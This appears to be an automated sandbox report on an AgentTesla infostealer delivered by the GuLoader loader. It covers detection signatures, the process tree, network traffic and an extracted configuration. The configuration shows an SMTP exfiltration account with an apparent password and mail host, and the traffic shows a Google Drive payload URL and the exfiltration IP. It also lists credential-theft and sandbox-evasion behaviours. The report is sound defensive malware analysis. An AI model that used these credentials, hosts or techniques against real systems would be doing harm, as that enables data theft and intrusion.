Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DOC 13102021.exe

Overview

General Information

Sample Name:DOC 13102021.exe
Analysis ID:1647
MD5:31851bac3685c5641fc16e256c94c4a8
SHA1:31fea2ceaeb535863d46ec5260385649c34c0fa0
SHA256:e1940206b5e3300e88b817953a62d90a2e69b738df549dc5da993409a6487ae1
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • DOC 13102021.exe (PID: 8804 cmdline: 'C:\Users\user\Desktop\DOC 13102021.exe' MD5: 31851BAC3685C5641FC16E256C94C4A8)
    • RegAsm.exe (PID: 2588 cmdline: 'C:\Users\user\Desktop\DOC 13102021.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tKZVPq.exe (PID: 7824 cmdline: 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales@binaryinfotech.comabc123#@!mail.binaryinfotech.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1441695522.0000000002200000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 2588JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 2588JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 132.148.164.170, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2588, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49766

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.2588.25.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales@binaryinfotech.comabc123#@!mail.binaryinfotech.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: DOC 13102021.exeVirustotal: Detection: 30%Perma Link
            Source: DOC 13102021.exeReversingLabs: Detection: 25%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DAF540 CryptUnprotectData,25_2_00DAF540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DAFC31 CryptUnprotectData,25_2_00DAFC31
            Source: DOC 13102021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49762 version: TLS 1.2
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000019.00000003.2355199055.0000000020B21000.00000004.00000010.sdmp, tKZVPq.exe, tKZVPq.exe.25.dr
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000019.00000003.2355199055.0000000020B21000.00000004.00000010.sdmp, tKZVPq.exe, 00000029.00000000.1718608698.0000000000F72000.00000002.00020000.sdmp, tKZVPq.exe.25.dr
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004022D6
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_00403455
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_0040323D
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004034E9
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004032BE
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_0040334C
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_0040356C
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004033D5
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004031DE
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 4x nop then mov ebx, ebx0_2_004035EB

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49766 -> 132.148.164.170:587
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf7s0cou2qripnjj0rpkilfov4/1634137800000/16524389560697724177/*/1C8oenb3NC7djnCvQzvUetP49sAKvj9vX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49766 -> 132.148.164.170:587
            Source: global trafficTCP traffic: 192.168.11.20:49766 -> 132.148.164.170:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000019.00000002.5659697013.000000001DBED000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000019.00000002.5660376539.000000001DC4E000.00000004.00000001.sdmpString found in binary or memory: http://binaryinfotech.com
            Source: RegAsm.exe, 00000019.00000002.5642799670.0000000000FA7000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000019.00000002.5642799670.0000000000FA7000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000019.00000002.5660376539.000000001DC4E000.00000004.00000001.sdmpString found in binary or memory: http://mail.binaryinfotech.com
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: http://nQcaIX.com
            Source: RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-28-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf
            Source: RegAsm.exe, 00000019.00000002.5640301133.0000000000F28000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000019.00000002.5640301133.0000000000F28000.00000004.00000020.sdmp, RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5636629483.0000000000D00000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX
            Source: RegAsm.exe, 00000019.00000003.1413747869.0000000000FB4000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX_WmtySzXDjqnzS380
            Source: RegAsm.exe, 00000019.00000002.5659697013.000000001DBED000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.5660466574.000000001DC5C000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000003.2361567201.000000001C8C1000.00000004.00000001.sdmpString found in binary or memory: https://iMTj3lrhN3y57FrL8VE.com
            Source: RegAsm.exe, 00000019.00000002.5659697013.000000001DBED000.00000004.00000001.sdmpString found in binary or memory: https://iMTj3lrhN3y57FrL8VE.comt-
            Source: RegAsm.exe, 00000019.00000002.5658813337.000000001DB81000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000019.00000002.5658813337.000000001DB81000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf7s0cou2qripnjj0rpkilfov4/1634137800000/16524389560697724177/*/1C8oenb3NC7djnCvQzvUetP49sAKvj9vX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.11.20:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49762 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: DOC 13102021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004018680_2_00401868
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004022D60_2_004022D6
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004034550_2_00403455
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0040323D0_2_0040323D
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004034E90_2_004034E9
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004032BE0_2_004032BE
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0040334C0_2_0040334C
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0040356C0_2_0040356C
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004033D50_2_004033D5
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004031DE0_2_004031DE
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004035EB0_2_004035EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4C89825_2_00A4C898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4C26225_2_00A4C262
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A43A5025_2_00A43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4432025_2_00A44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4112025_2_00A41120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00A4370825_2_00A43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00D26B0825_2_00D26B08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00D215B825_2_00D215B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA08DE25_2_00DA08DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA644025_2_00DA6440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA5D5825_2_00DA5D58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA12D025_2_00DA12D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DAC24825_2_00DAC248
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA0F9E25_2_00DA0F9E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA771825_2_00DA7718
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DA0CB425_2_00DA0CB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBDC3D25_2_00DBDC3D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBB21625_2_00DBB216
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBECD825_2_00DBECD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBF0C025_2_00DBF0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBF07825_2_00DBF078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DB8C7025_2_00DB8C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DB581825_2_00DB5818
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DBEBFC25_2_00DBEBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DB57B825_2_00DB57B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00DB333025_2_00DB3330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00F1419025_2_00F14190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00F167A825_2_00F167A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00F1004025_2_00F10040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00F103E025_2_00F103E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_00F1559025_2_00F15590
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1D9E5E0825_2_1D9E5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1D9E4ACC25_2_1D9E4ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1D9E5DC125_2_1D9E5DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_1D9E6AF125_2_1D9E6AF1
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 41_2_00F73DFE41_2_00F73DFE
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: String function: 0040177E appears 94 times
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: DOC 13102021.exe, 00000000.00000000.570422254.000000000041D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametombo.exe vs DOC 13102021.exe
            Source: DOC 13102021.exe, 00000000.00000002.1442222105.0000000002B20000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametombo.exeFE2X vs DOC 13102021.exe
            Source: DOC 13102021.exeBinary or memory string: OriginalFilenametombo.exe vs DOC 13102021.exe
            Source: DOC 13102021.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\DOC 13102021.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: DOC 13102021.exeVirustotal: Detection: 30%
            Source: DOC 13102021.exeReversingLabs: Detection: 25%
            Source: DOC 13102021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\DOC 13102021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\DOC 13102021.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DOC 13102021.exe 'C:\Users\user\Desktop\DOC 13102021.exe'
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\DOC 13102021.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\DOC 13102021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\DOC 13102021.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\tKZVPqJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@6/5@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000019.00000003.2355199055.0000000020B21000.00000004.00000010.sdmp, tKZVPq.exe, tKZVPq.exe.25.dr
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000019.00000003.2355199055.0000000020B21000.00000004.00000010.sdmp, tKZVPq.exe, 00000029.00000000.1718608698.0000000000F72000.00000002.00020000.sdmp, tKZVPq.exe.25.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000000.00000002.1441695522.0000000002200000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_00401868 push ds; retf 9800h0_2_00401FBF
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_0040727E push cs; iretd 0_2_0040727F
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_004040ED push 00000046h; ret 0_2_004040F1
            Source: C:\Users\user\Desktop\DOC 13102021.exeCode function: 0_2_00406AA9 push ecx; iretd 0_2_00406AAA
